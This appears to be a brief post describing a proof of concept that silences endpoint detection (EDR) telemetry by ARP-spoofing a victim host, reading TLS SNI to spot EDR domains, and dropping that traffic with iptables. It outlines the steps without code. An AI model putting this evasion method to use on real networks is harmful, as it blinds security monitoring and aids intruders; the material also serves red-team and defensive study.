A PoC for a network-based EDR telemetry filtering using ARP Spoofing.
1. ARP Spoofing: Perform ARP spoofing against the victim host to make the attacker PC act as the gateway.
2. Traffic Sniffing: Sniff network traffic to intercept TLS Client Hello packets and inspect the Server Name Indication (SNI) for EDR-related domains.
3. Traffic Blocking: Utilise iptables to block traffic destined for EDR servers based on the inspection results.
The advantage of this approach compared to host firewall-based filtering is that it doesn't require admin privileges or user access to the victim host. But yes, attacker needs to be on the same network to perform ARP spoofing :)
14 июл 2024